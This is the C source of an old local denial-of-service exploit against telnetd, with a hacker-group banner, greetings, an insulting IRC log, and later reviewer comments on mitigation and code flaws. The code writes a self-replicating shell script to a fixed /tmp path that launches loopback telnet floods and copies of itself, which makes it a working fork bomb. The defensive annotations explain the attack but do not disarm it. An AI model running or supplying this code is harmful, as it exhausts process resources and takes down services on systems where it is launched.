/*
* MaD SKiLL 'H'
* http://www.madskill.tk
*
* Telnetd + Process overloading exploit
* 
*                                                                 
* NNN)   NNN)       (NNNNNN.   .JNNN_ NN)  JNN)    JNN    .NN)    
* NNNN. JNNN        (NNNNNNNL  NNNNNN NN) (NNN`    4NF    `NN`    
* (NNNL.NNNF  .NN.  (NN   `NN) NNL `N (N)JNN)F NN  (N)     NN     
* (N)NNNN4N)  NNNN   NN    4N) `NNNL  (NNNN`() NN  (N)     NN     
* (N)(NNF(N) JNLNNL  N)    NN).. 4NNN `NNNNL   NN   N)     (N     
*  NN NN (N) NNNNNN).NN .JNNN.(NL JNN  N)(NNN. (N   NN __J (N).__)
*  NN N  (N)(NN) (N)(NNNNNNF()`NNNNNN  NN  NNN (N)  NNNNNN (NNNNN)
*  )  "  `/N ` N  `)(FF4`"" () _F`N N)`FF   `  (N) `N"` `F 4F"  4`
* ()       `         (N        N)          N   N)       ()      N 
* 
*                                                       
*      NN   NNN)   NNNN  NNN.  JNN  .JNNN. (NNNNNN. NNNNNNNNN
*      NN   (NN`  (NNNF  NNNN .NNN .NNNNNN. NNNNNNN NNNNFNNNF
*      NN    NN) .NN4N)   NNNNNN)L (NF``NN) NN  .NN /`  JNN"`
*      NNNNNNNN) JN) N)   ``NNN) N (N    N) (NNNNNF L  JNN)  
*      4NNNNNNN)(NNNNNNN   JNNNNL" (N)  (N) (NNNNL  `.NNN``  
*      (N`  `NN``FN4"NF( .JNN (NNN.`NN._NN  NN `NNL .NN) ._J)
*      (N    NN. (.  N)  NNN   4NN) NNNNN)  NN  (NN NNNNNNNN)
*      (J)   NN) () (4)  "FN     )  `LF  J  `    4) `4  ) 4")
*      ``    ()      ``    N         ()      ()  ``    (N    
*                                                                 
*
* Telnetd + Process overloading DoS flaw was found by Zombie of MsH
* Zombie wrote a code for it, I rewrote it the right way. *PRIVATE RELEASE*
*
* Tested on:
* Slackware 8.0 ..... kernel 2.4.18 STABLE: Vulnerable
* RedHat 7.2 ........ kernel 2.4.18 STABLE: Vulnerable
* Mandrake 8.2 ...... kernel 2.4.18 STABLE: Vulnerable
*
* -skyrim (skyrim@m4dskill.tk)
*
* Note: This sploit is for localhost only (!)
* 
*
* Shouts go to: MsH, DFA, uDc, DBH; zombie, [4|20], lau, kebab_demon, madness, microtech, 
* execv, sanchez, omnisync, Primus, ZroBioNe, Am0k, Xo|l, slash_, raZzle, fearless, samko, 
* DJ----, Slider, mannie, Kell and all others
*
* Fuckoffs to: Daimon_x, A lame kiddo who does nothing but jerking 23/7 and the other hours
* he gets on IRC to tell everyone he's laughing.
* ##IRC LOG##
* <Daimon_x> QhWHahaHAWHhahwahWHawhaHWhAhaha
* <Daimon_x> I lAuGh, I lAugH VeRy lOud
* <skyrim> k..
* <Daimon_x> hihihihihihihiihhihiihihahahahihihii
* <Daimon_x> tRy anD HaX mE if U cAN hahahahahahahahah
* <skyrim> no
* <Daimon_x> wHy u CaNt eVeN hAx winDozE XP ?!?!?!?!?!?! HaHaHiHi
* <skyrim> ..
* <Daimon_x> HaHaHiHi u ArE sO lAmE
* <Daimon_x> eVeN i CaN hAcK wiTh TeLnEt BuT BuWhaHWhahAha U proLly DoNt kNoW wHaT ThAt iS dO U u SuCkA
*
*/

#include <stdio.h>

/*
 * Entry point of a local denial-of-service proof of concept.
 *
 * What the visible code does: it takes one argument (a TCP port), writes a
 * shell script to a fixed path under /tmp, and runs that script three times
 * through system(). The script starts two background telnet clients against
 * 127.0.0.1:<port> with stdin taken from /dev/zero, then launches three more
 * background copies of itself. The result is self-replicating process
 * creation plus a stream of loopback telnet sessions. This is resource
 * exhaustion (a fork-bomb pattern), not a memory-corruption "overflow" as
 * the banner text suggests.
 *
 * Reviewer notes for defenders:
 *  - Mitigation: enforce per-user process limits (RLIMIT_NPROC, e.g.
 *    `ulimit -u` or pam_limits), cap sessions in the super-server (xinetd
 *    `instances`, `per_source`, `cps`), and retire telnetd in favour of SSH.
 *  - Detection: one UID's process count growing rapidly, a burst of loopback
 *    connections to the telnet port, and a script under /tmp that re-invokes
 *    its own path.
 *
 * Code-quality observations (the code below is left byte-identical):
 *  - main has no declared return type and no return statement.
 *  - Only <stdio.h> is included, so exit(), atoi(), system() and close() are
 *    used without prototypes.
 */
main(int argc, char *argv[]) {
int attackport;
FILE *file;

printf(".:[MaD SKiLL 'H']:.\nLocal telnetd + kernel overflow DoS\n\n");

/* Exactly one argument is required; otherwise print usage and exit with status 1. */
if (argc!=2) { fprintf(stderr, "[+] Usage: %s <telnetd port>\n", argv[0]); exit(1); }

/* atoi() reports no errors: non-numeric input silently becomes 0 and the value is never range-checked. */
attackport=atoi(argv[1]);

printf("[+] Generating telnetd repeat thread.. ");
/*
 * NOTE(review): fixed, predictable file name in /tmp, opened with "w" and
 * no exclusive-create or symlink protection (the CWE-377 insecure temporary
 * file pattern). The fopen() result is not checked, so a failure hands a
 * NULL stream to the fprintf() calls below.
 */
file = fopen("/tmp/0wnage382","w");
/* Write the script: shebang, two background telnet clients, then three background re-invocations of the same script. */
fprintf(file, "#!/bin/sh\n");
fprintf(file, "telnet 127.0.0.1 %d < /dev/zero > /dev/null & \n telnet 127.0.0.1 %d < /dev/zero > /dev/null &\n", attackport, attackport);
fprintf(file, "/bin/sh /tmp/0wnage382 &\n/bin/sh /tmp/0wnage382 &\n /bin/sh /tmp/0wnage382 &\n");
/*
 * NOTE(review): close() takes an int file descriptor but is handed a FILE *
 * here, and the stream is never passed to fclose(). Treat the listing as
 * unreliable as written.
 */
close(file);

/* Run the script three times via system(); none of the return values are checked. */
printf("OK\n[+] Calling telnetd repeat threads..");
printf(" 1");
system("/bin/sh /tmp/0wnage382");
printf(" 2");
system("/bin/sh /tmp/0wnage382");
printf(" 3");
system("/bin/sh /tmp/0wnage382");
printf("\n[+] Repeat threads blasting!\n");
/* The success banner is printed unconditionally; nothing above verifies any effect on the target service. */
printf("\nDoS successfull. MsH 0wnz j00!");
}


